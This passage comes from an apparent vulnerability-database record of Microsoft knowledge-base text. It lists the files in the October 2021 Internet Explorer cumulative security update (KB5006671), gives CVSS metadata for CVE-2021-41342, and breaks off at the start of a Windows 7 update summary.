14-Sep-2021| 12:44| 134,144 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 12:44| 107,008 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 12:45| 123,392 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 12:46| 127,488 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 12:46| 128,512 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 12:47| 88,576 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 12:48| 82,944 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 12:48| 125,440 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 12:49| 123,392 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 12:50| 120,320 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 12:50| 130,560 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 12:51| 129,024 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 12:52| 125,952 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 12:52| 129,024 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 12:54| 128,000 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 12:54| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 12:55| 129,024 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 12:55| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 12:56| 124,416 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 12:57| 121,856 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 12:57| 115,712 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 12:58| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 12:59| 125,440 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 13:00| 72,704 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 13:00| 73,728 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 13:01| 73,728 \niedkcs32.dll| 18.0.9600.20139| 14-Sep-2021| 12:37| 341,920 \ninstall.ins| Not versioned| 13-Sep-2021| 19:04| 464 \nieapfltr.dat| 10.0.9301.0| 23-Mar-2021| 17:33| 616,104 \nieapfltr.dll| 11.0.9600.20139| 13-Sep-2021| 20:19| 710,656 \niedvtool.dll| 11.0.9600.20139| 13-Sep-2021| 21:35| 772,608 \nDiagnosticsTap.dll| 11.0.9600.20139| 13-Sep-2021| 20:52| 175,104 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:37| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:38| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:39| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:39| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:40| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:41| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:40| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:42| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:42| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:43| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:44| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:44| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:45| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:46| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:46| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:47| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:48| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:48| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:49| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:50| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:50| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:51| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:52| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:52| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:53| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:54| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:55| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:55| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:56| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:56| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:57| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:58| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:59| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:59| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 13:00| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 13:01| 2,048 \nF12Tools.dll| 11.0.9600.20139| 13-Sep-2021| 20:52| 256,000 \nmsfeedsbs.mof| Not versioned| 13-Sep-2021| 19:15| 1,574 \nmsfeedsbs.dll| 11.0.9600.20139| 13-Sep-2021| 20:47| 52,736 \nmsfeedssync.exe| 11.0.9600.20139| 13-Sep-2021| 21:10| 11,776 \nhtml.iec| 2019.0.0.20139| 13-Sep-2021| 21:08| 341,504 \nielowutil.exe| 11.0.9600.20139| 13-Sep-2021| 21:02| 221,184 \nieproxy.dll| 11.0.9600.20139| 13-Sep-2021| 20:18| 310,784 \nIEShims.dll| 11.0.9600.20139| 13-Sep-2021| 20:22| 290,304 \njsprofilerui.dll| 11.0.9600.20139| 13-Sep-2021| 20:48| 579,584 \nMshtmlDac.dll| 11.0.9600.20139| 13-Sep-2021| 21:07| 64,000 \nnetworkinspection.dll| 11.0.9600.20139| 13-Sep-2021| 20:44| 1,075,200 \nmsrating.dll| 11.0.9600.20139| 13-Sep-2021| 20:47| 168,960 \nicrav03.rat| Not versioned| 23-Mar-2021| 17:36| 8,798 \nticrf.rat| Not versioned| 23-Mar-2021| 17:36| 1,988 \niertutil.dll| 11.0.9600.20139| 13-Sep-2021| 21:09| 2,308,608 \nsqmapi.dll| 6.2.9200.16384| 14-Sep-2021| 12:37| 228,256 \ninseng.dll| 11.0.9600.20139| 13-Sep-2021| 20:49| 91,136 \nVGX.dll| 11.0.9600.20139| 13-Sep-2021| 20:46| 818,176 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:38| 2,066,432 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:37| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:38| 2,121,216 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:38| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:39| 2,075,648 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:39| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:40| 2,063,872 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:39| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:41| 2,314,240 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:40| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:41| 2,390,528 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:41| 3,584 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:40| 2,033,152 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:40| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:42| 2,307,584 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:42| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:43| 2,255,872 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:42| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:43| 2,061,312 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:43| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:44| 2,326,016 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:44| 3,584 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:45| 2,019,840 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:44| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:45| 2,071,040 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:45| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:46| 2,082,816 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:46| 3,584 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:47| 2,307,584 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:46| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:47| 2,170,368 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:47| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:48| 2,153,984 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:48| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:49| 2,291,712 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:48| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:49| 2,283,520 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:49| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:50| 2,052,096 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:50| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:51| 2,301,952 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:51| 3,584 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:51| 2,093,056 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:51| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:52| 2,075,648 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:52| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:53| 2,299,392 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:53| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:54| 2,094,592 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:53| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:54| 2,316,800 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:54| 3,584 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:55| 2,305,536 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:54| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:56| 2,278,912 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:55| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:56| 2,285,568 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:56| 3,584 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:57| 2,060,288 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:57| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:57| 2,315,776 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:57| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:58| 2,279,424 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:58| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:59| 2,324,992 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:58| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 13:00| 2,098,176 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:59| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 13:00| 1,890,304 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 13:00| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 13:01| 1,890,304 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 13:01| 3,072 \nieinstal.exe| 11.0.9600.20139| 13-Sep-2021| 20:46| 475,648 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:37| 29,184 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:38| 29,696 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:39| 32,768 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:40| 33,280 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:40| 35,328 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:41| 37,888 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:40| 29,696 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:42| 34,304 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:42| 29,696 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:43| 33,280 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:44| 34,304 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:44| 27,648 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:45| 29,696 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:46| 34,304 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:46| 33,792 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:47| 23,040 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:48| 22,016 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:49| 29,696 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:49| 29,696 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:50| 31,232 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:51| 34,304 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:52| 35,840 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:52| 32,768 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:52| 33,280 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:53| 29,696 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:54| 34,816 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:55| 33,280 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:55| 32,256 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:56| 29,696 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:56| 32,768 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:57| 29,696 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:58| 30,720 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:59| 29,696 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 12:59| 16,384 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 13:00| 16,896 \njscript9.dll.mui| 11.0.9600.20139| 14-Sep-2021| 13:01| 16,896 \n \n### **Windows Server 2008**\n\n## \n\n__\n\nInternet Explorer 9 on all supported x86-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nurlmon.dll| 9.0.8112.21601| 15-Sep-2021| 11:59| 1,142,784 \niexplore.exe| 9.0.8112.21601| 15-Sep-2021| 12:11| 751,528 \ninetcpl.cpl| 9.0.8112.21601| 15-Sep-2021| 11:58| 1,427,968 \nwininet.dll| 9.0.8112.21601| 15-Sep-2021| 11:59| 1,132,544 \njsproxy.dll| 9.0.8112.21601| 15-Sep-2021| 11:58| 75,776 \nWininetPlugin.dll| 1.0.0.1| 15-Sep-2021| 11:58| 66,048 \ntdc.ocx| 9.0.8112.21601| 15-Sep-2021| 11:57| 63,488 \niedvtool.dll| 9.0.8112.21601| 15-Sep-2021| 11:58| 678,912 \ndxtmsft.dll| 9.0.8112.21601| 15-Sep-2021| 11:57| 354,304 \ndxtrans.dll| 9.0.8112.21601| 15-Sep-2021| 11:57| 223,744 \nmsfeeds.dll| 9.0.8112.21601| 15-Sep-2021| 11:57| 607,744 \nmsfeeds.mof| Not versioned| 15-Sep-2021| 11:33| 1,518 \nmsfeedsbs.mof| Not versioned| 15-Sep-2021| 11:33| 1,574 \nmsfeedsbs.dll| 9.0.8112.21601| 15-Sep-2021| 11:57| 41,472 \nmsfeedssync.exe| 9.0.8112.21601| 15-Sep-2021| 11:57| 10,752 \nmshta.exe| 9.0.8112.21601| 15-Sep-2021| 11:57| 11,776 \nhtml.iec| 2019.0.0.21596| 15-Sep-2021| 12:00| 367,616 \nmshtmled.dll| 9.0.8112.21601| 15-Sep-2021| 11:57| 72,704 \nmshtml.dll| 9.0.8112.21601| 15-Sep-2021| 12:03| 12,845,056 \nmshtml.tlb| 9.0.8112.21601| 15-Sep-2021| 11:57| 2,382,848 \nielowutil.exe| 9.0.8112.21601| 15-Sep-2021| 11:58| 223,232 \nieproxy.dll| 9.0.8112.21601| 15-Sep-2021| 11:58| 195,072 \nIEShims.dll| 9.0.8112.21601| 15-Sep-2021| 11:58| 194,560 \nExtExport.exe| 9.0.8112.21601| 15-Sep-2021| 11:58| 22,528 \nWindows Pop-up Blocked.wav| Not versioned| 11-Mar-2021| 0:00| 85,548 \nWindows Information Bar.wav| Not versioned| 11-Mar-2021| 0:00| 23,308 \nWindows Feed Discovered.wav| Not versioned| 11-Mar-2021| 0:00| 19,884 \nWindows Navigation Start.wav| Not versioned| 11-Mar-2021| 0:00| 11,340 \nieUnatt.exe| 9.0.8112.21601| 15-Sep-2021| 11:58| 142,848 \njsdbgui.dll| 9.0.8112.21601| 15-Sep-2021| 11:58| 387,584 \niertutil.dll| 9.0.8112.21601| 15-Sep-2021| 11:58| 1,808,384 \nsqmapi.dll| 6.0.6000.16386| 15-Sep-2021| 12:11| 142,760 \nVGX.dll| 9.0.8112.21601| 15-Sep-2021| 11:58| 769,024 \nurl.dll| 9.0.8112.21601| 15-Sep-2021| 11:58| 231,936 \nieframe.dll| 9.0.8112.21601| 15-Sep-2021| 11:59| 9,757,696 \nieui.dll| 9.0.8112.21601| 15-Sep-2021| 11:56| 176,640 \nieinstal.exe| 9.0.8112.21601| 15-Sep-2021| 11:58| 474,624 \nInetRes.adml| Not versioned| 15-Sep-2021| 12:17| 393,813 \ninetres.admx| Not versioned| 11-Mar-2021| 0:10| 1,601,204 \njsdebuggeride.dll| 9.0.8112.21601| 15-Sep-2021| 11:58| 104,448 \njscript.dll| 5.8.7601.21596| 15-Sep-2021| 11:58| 723,456 \njscript9.dll| 9.0.8112.21601| 15-Sep-2021| 12:04| 1,819,648 \nvbscript.dll| 5.8.7601.21596| 15-Sep-2021| 11:58| 434,176 \n \n## \n\n__\n\nInternet Explorer 9 on all supported x64-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nurlmon.dll| 9.0.8112.21601| 15-Sep-2021| 13:14| 1,391,616 \niexplore.exe| 9.0.8112.21601| 15-Sep-2021| 13:30| 757,656 \ninetcpl.cpl| 9.0.8112.21601| 15-Sep-2021| 13:13| 1,494,528 \nwininet.dll| 9.0.8112.21601| 15-Sep-2021| 13:14| 1,395,200 \njsproxy.dll| 9.0.8112.21601| 15-Sep-2021| 13:13| 97,280 \nWininetPlugin.dll| 1.0.0.1| 15-Sep-2021| 13:13| 86,528 \ntdc.ocx| 9.0.8112.21601| 15-Sep-2021| 13:12| 76,800 \niedvtool.dll| 9.0.8112.21601| 15-Sep-2021| 13:13| 887,808 \ndxtmsft.dll| 9.0.8112.21601| 15-Sep-2021| 13:12| 452,608 \ndxtrans.dll| 9.0.8112.21601| 15-Sep-2021| 13:12| 281,600 \nmsfeeds.dll| 9.0.8112.21601| 15-Sep-2021| 13:12| 729,088 \nmsfeeds.mof| Not versioned| 15-Sep-2021| 12:45| 1,518 \nmsfeedsbs.mof| Not versioned| 15-Sep-2021| 12:45| 1,574 \nmsfeedsbs.dll| 9.0.8112.21601| 15-Sep-2021| 13:12| 55,296 \nmsfeedssync.exe| 9.0.8112.21601| 15-Sep-2021| 13:12| 11,264 \nmshta.exe| 9.0.8112.21601| 15-Sep-2021| 13:12| 12,800 \nhtml.iec| 2019.0.0.21596| 15-Sep-2021| 13:16| 448,512 \nmshtmled.dll| 9.0.8112.21601| 15-Sep-2021| 13:12| 96,256 \nmshtml.dll| 9.0.8112.21601| 15-Sep-2021| 13:23| 18,812,416 \nmshtml.tlb| 9.0.8112.21601| 15-Sep-2021| 13:12| 2,382,848 \nielowutil.exe| 9.0.8112.21601| 15-Sep-2021| 13:13| 223,744 \nieproxy.dll| 9.0.8112.21601| 15-Sep-2021| 13:13| 550,912 \nIEShims.dll| 9.0.8112.21601| 15-Sep-2021| 13:13| 305,664 \nWindows Pop-up Blocked.wav| Not versioned| 11-Mar-2021| 0:00| 85,548 \nWindows Information Bar.wav| Not versioned| 11-Mar-2021| 0:00| 23,308 \nWindows Feed Discovered.wav| Not versioned| 11-Mar-2021| 0:00| 19,884 \nWindows Navigation Start.wav| Not versioned| 11-Mar-2021| 0:00| 11,340 \nieUnatt.exe| 9.0.8112.21601| 15-Sep-2021| 13:13| 173,056 \njsdbgui.dll| 9.0.8112.21601| 15-Sep-2021| 13:13| 499,200 \niertutil.dll| 9.0.8112.21601| 15-Sep-2021| 13:13| 2,163,200 \nsqmapi.dll| 6.0.6000.16386| 15-Sep-2021| 13:30| 176,024 \nVGX.dll| 9.0.8112.21601| 15-Sep-2021| 13:13| 997,376 \nurl.dll| 9.0.8112.21601| 15-Sep-2021| 13:13| 237,056 \nieframe.dll| 9.0.8112.21601| 15-Sep-2021| 13:15| 10,943,488 \nieui.dll| 9.0.8112.21601| 15-Sep-2021| 13:10| 248,320 \nieinstal.exe| 9.0.8112.21601| 15-Sep-2021| 13:13| 490,496 \nInetRes.adml| Not versioned| 15-Sep-2021| 13:37| 393,813 \ninetres.admx| Not versioned| 11-Mar-2021| 0:10| 1,601,204 \njsdebuggeride.dll| 9.0.8112.21601| 15-Sep-2021| 13:13| 141,312 \njscript.dll| 5.8.7601.21596| 15-Sep-2021| 13:13| 818,176 \njscript9.dll| 9.0.8112.21601| 15-Sep-2021| 13:19| 2,358,784 \nvbscript.dll| 5.8.7601.21596| 15-Sep-2021| 13:13| 583,680 \niexplore.exe| 9.0.8112.21601| 15-Sep-2021| 12:11| 751,528 \nieUnatt.exe| 9.0.8112.21601| 15-Sep-2021| 11:58| 142,848 \nurlmon.dll| 9.0.8112.21601| 15-Sep-2021| 11:59| 1,142,784 \ninetcpl.cpl| 9.0.8112.21601| 15-Sep-2021| 11:58| 1,427,968 \nwininet.dll| 9.0.8112.21601| 15-Sep-2021| 11:59| 1,132,544 \njsproxy.dll| 9.0.8112.21601| 15-Sep-2021| 11:58| 75,776 \nWininetPlugin.dll| 1.0.0.1| 15-Sep-2021| 11:58| 66,048 \ntdc.ocx| 9.0.8112.21601| 15-Sep-2021| 11:57| 63,488 \niedvtool.dll| 9.0.8112.21601| 15-Sep-2021| 11:58| 678,912 \ndxtmsft.dll| 9.0.8112.21601| 15-Sep-2021| 11:57| 354,304 \ndxtrans.dll| 9.0.8112.21601| 15-Sep-2021| 11:57| 223,744 \nmsfeeds.dll| 9.0.8112.21601| 15-Sep-2021| 11:57| 607,744 \nmsfeeds.mof| Not versioned| 15-Sep-2021| 11:33| 1,518 \nmsfeedsbs.mof| Not versioned| 15-Sep-2021| 11:33| 1,574 \nmsfeedsbs.dll| 9.0.8112.21601| 15-Sep-2021| 11:57| 41,472 \nmsfeedssync.exe| 9.0.8112.21601| 15-Sep-2021| 11:57| 10,752 \nmshta.exe| 9.0.8112.21601| 15-Sep-2021| 11:57| 11,776 \nhtml.iec| 2019.0.0.21596| 15-Sep-2021| 12:00| 367,616 \nmshtmled.dll| 9.0.8112.21601| 15-Sep-2021| 11:57| 72,704 \nmshtml.dll| 9.0.8112.21601| 15-Sep-2021| 12:03| 12,845,056 \nmshtml.tlb| 9.0.8112.21601| 15-Sep-2021| 11:57| 2,382,848 \nielowutil.exe| 9.0.8112.21601| 15-Sep-2021| 11:58| 223,232 \nieproxy.dll| 9.0.8112.21601| 15-Sep-2021| 11:58| 195,072 \nIEShims.dll| 9.0.8112.21601| 15-Sep-2021| 11:58| 194,560 \nExtExport.exe| 9.0.8112.21601| 15-Sep-2021| 11:58| 22,528 \njsdbgui.dll| 9.0.8112.21601| 15-Sep-2021| 11:58| 387,584 \niertutil.dll| 9.0.8112.21601| 15-Sep-2021| 11:58| 1,808,384 \nsqmapi.dll| 6.0.6000.16386| 15-Sep-2021| 12:11| 142,760 \nVGX.dll| 9.0.8112.21601| 15-Sep-2021| 11:58| 769,024 \nurl.dll| 9.0.8112.21601| 15-Sep-2021| 11:58| 231,936 \nieframe.dll| 9.0.8112.21601| 15-Sep-2021| 11:59| 9,757,696 \nieui.dll| 9.0.8112.21601| 15-Sep-2021| 11:56| 176,640 \nieinstal.exe| 9.0.8112.21601| 15-Sep-2021| 11:58| 474,624 \njsdebuggeride.dll| 9.0.8112.21601| 15-Sep-2021| 11:58| 104,448 \njscript.dll| 5.8.7601.21596| 15-Sep-2021| 11:58| 723,456 \njscript9.dll| 9.0.8112.21601| 15-Sep-2021| 12:04| 1,819,648 \nvbscript.dll| 5.8.7601.21596| 15-Sep-2021| 11:58| 434,176 \n \n## **Information about protection and security**\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n\n## **References**\n\nLearn about the [terminology](<https://support.microsoft.com/help/824684>) that Microsoft uses to describe software updates.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-12T07:00:00", "type": "mskb", "title": "KB5006671: Cumulative security update for Internet Explorer: October 12, 2021", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41342"], "modified": "2021-10-12T07:00:00", "id": "KB5006671", "href": "https://support.microsoft.com/en-us/help/5006671", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-18T17:45:42", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update.\n\n**Important: **Windows 7 and Windows Server 2008 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 and Windows Server 2008 R2 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a known issue that might prevent devices from downloading and installing printer drivers when the devices 